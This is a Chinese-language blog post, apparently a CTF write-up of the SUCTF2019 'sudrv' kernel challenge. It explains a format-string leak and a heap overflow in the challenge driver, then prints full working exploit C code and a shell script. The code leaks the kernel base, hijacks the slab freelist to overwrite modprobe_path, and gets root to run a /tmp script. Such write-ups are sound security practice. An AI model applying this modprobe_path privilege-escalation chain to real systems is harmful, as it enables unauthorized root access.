• [格式化字符串漏洞+堆溢出] Suctf2019_sudrv


    前言

    悲悲悲, 晚上5点 os-lab 实验报告 ddl, 早上肝实验报告肝到一半, 然后抽风想去做一道 kernel pwn.

    然后在一个地方卡了半个多小时, 结果就是写这个 post 的时候已经两点了, 悲.

    漏洞分析

    这题算是一个入门题, 哎, 就是我在泄漏 kernel offset 的时候想一步到位, 结果就搞了好久.

    内核版本: v4.20.12 (对于 kernel pwn 而言, 比较老了

    保护: 开了 smep, kaslr

    堆行为: free pointer 在堆块头8字节, 没开 random_freelist等保护

    题目实现了一个菜单:

    其中可以申请的堆块大小在 [1, 0xfff] 之间, 释放堆块不存在问题.

    漏洞点:

    sudrv_ioctl_cold_2(su_buf) 存在格式化字符串漏洞, 函数如下:

    而 sudrv_write 函数存在堆溢出:

    这里 IDA 识别的有些问题, copy_user_generic_unrolled 跟 copy_from_user 差不多, 只是 copy_from_user 多一些检查 

    漏洞利用

    1) 首先可以利用格式化字符串漏洞去泄漏内核基地址

    2) 然后利用堆溢出去劫持 freelist 到 modprobe_path

    3) 最后利用 modprobe_path 进行 flag 的读取

    注意点:

            1) 在劫持 freelist 时, 注意堆块大小的选取, 因为在后续的操作中也可能会分配堆块 (比如 system 函数), 所以当你把 freelist 破坏后, 后面分配堆块时就会报错, 因为 modprobe_path 的头8字节为文件名, 其不是一个有效地址.

            2) 泄漏内核基地址时, printk 在程序退出时才会写到缓冲区中. 这里我搞了好久, 最后选择两个程序, 一个泄漏地址, 一个进行堆劫持. 但是看网上可以直接手动输入...悲

    exp 如下:

    leak_addr.c

    1. #ifndef _GNU_SOURCE
    2. #define _GNU_SOURCE
    3. #endif
    4. #include
    5. #include
    6. #include
    7. #include
    8. #include
    9. #include
    10. int fd;
    11. void add(uint64_t size) { ioctl(fd, 0x73311337, size); }
    12. void fmt() { ioctl(fd, 0xDEADBEEF, 0); }
    13. void dele() { ioctl(fd, 0x13377331, 0); }
    14. void edit(char* buf, uint64_t size) { write(fd, buf, size); }
    15. int main(int argc, char** argv, char** env)
    16. {
    17. fd = open("/dev/meizijiutql", O_RDWR);
    18. if (fd < 0) puts("[X] FAILED to open dev file"), exit(EXIT_FAILURE);
    19. char* fmt_str = "%llx-%llx-%llx-%llx-%llx__%llx-%llx-%llx-%llx-%llx-XiaozaYa";
    20. edit(fmt_str, strlen(fmt_str));
    21. fmt();
    22. close(fd);
    23. return 0;
    24. }

    exp.c:

    1. #ifndef _GNU_SOURCE
    2. #define _GNU_SOURCE
    3. #endif
    4. #include
    5. #include
    6. #include
    7. #include
    8. #include
    9. #include
    10. #include
    11. #include
    12. #include
    13. #include
    14. #include
    15. #include
    16. #include
    17. #include
    18. #include
    19. #include
    20. int fd;
    21. size_t kernel_offset;
    22. void add(uint64_t size) { ioctl(fd, 0x73311337, size); }
    23. void fmt() { ioctl(fd, 0xDEADBEEF, 0); }
    24. void dele() { ioctl(fd, 0x13377331, 0); }
    25. void edit(char* buf, uint64_t size) { write(fd, buf, size); }
    26. void get_flag(){
    27. system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag.txt' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
    28. system("chmod +x /tmp/x");
    29. system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
    30. system("chmod +x /tmp/dummy");
    31. system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 执行的文件 /tmp/x
    32. sleep(0.3);
    33. system("cat /flag.txt");
    34. exit(0);
    35. }
    36. #define SIZE 1024
    37. int main(int argc, char** argv, char** env)
    38. {
    39. char buf[0x1000] = { 0 };
    40. char* addr_ptr;
    41. fd = open("/dev/meizijiutql", O_RDWR);
    42. if (fd < 0) puts("[X] FAILED to open dev file"), exit(EXIT_FAILURE);
    43. system("dmesg | tail -n 3 > dmesg.txt");
    44. int ffd = open("dmesg.txt", O_RDONLY);
    45. if (ffd < 0) puts("[X] FAILED to exec dmesg cmd"), exit(EXIT_FAILURE);
    46. struct stat stat_buf;
    47. stat("dmesg.txt", &stat_buf);
    48. size_t size = stat_buf.st_size;
    49. read(ffd, buf, size);
    50. close(ffd);
    51. addr_ptr = strstr(buf, "__");
    52. if (!addr_ptr) puts("[X] FAILED to leak addr"), exit(EXIT_FAILURE);
    53. kernel_offset = strtoull(addr_ptr+2, addr_ptr+2+16, 16) - 0xffffffff811c827f;
    54. size_t modprobe_path = 0xffffffff82242320 + kernel_offset;
    55. printf("\033[32m[+] kernel_offset:\033[0m %#llx\n", kernel_offset);
    56. printf("\033[32m[+] modprobe_path:\033[0m %#llx\n", modprobe_path);
    57. puts("[+] \033[33mtry to hijack modprobe_path\033[0m");
    58. add(SIZE);
    59. *(uint64_t*)(buf+SIZE) = modprobe_path;
    60. puts("[+] hijack freelist");
    61. edit(buf, SIZE+8);
    62. add(SIZE);
    63. add(SIZE);
    64. memset(buf, 0, sizeof(buf));
    65. char path[0x10] = "/tmp/x";
    66. edit(path, sizeof(path));
    67. get_flag();
    68. return 0;
    69. }

    exp.sh:

    1. #!/bin/sh
    2. ./leak_addr
    3. ./exp

    效果如下: 可能会因为堆块不连续而失败, 多打几次

    总结

    我个人是不太喜欢劫持堆的 freelist, 因为我感觉其很不稳定, 当然啦, 自己比较菜. 看网上还有直接劫持栈提取的, 后面看看. 艹, 我的实验报告啊......溜了

  • 相关阅读:
    怎么理解Fiber,Fiber解决了什么问题
    vue 完整学习笔记(一)
    Qt中音频的使用
    优化 Redis 集群缓存分配:解决节点间分配不均导致内存溢出问题
    Python3+requests+unittest接口自动化测试
    ceval 数据集明文位置编码嵌入
    Netty Websocket SpringBoot Starter
    【Java 进阶篇】JDBC 管理事务详解
    Ps:陷印
    3D工业相机及品牌集合
  • 原文地址:https://blog.csdn.net/qq_61670993/article/details/134506339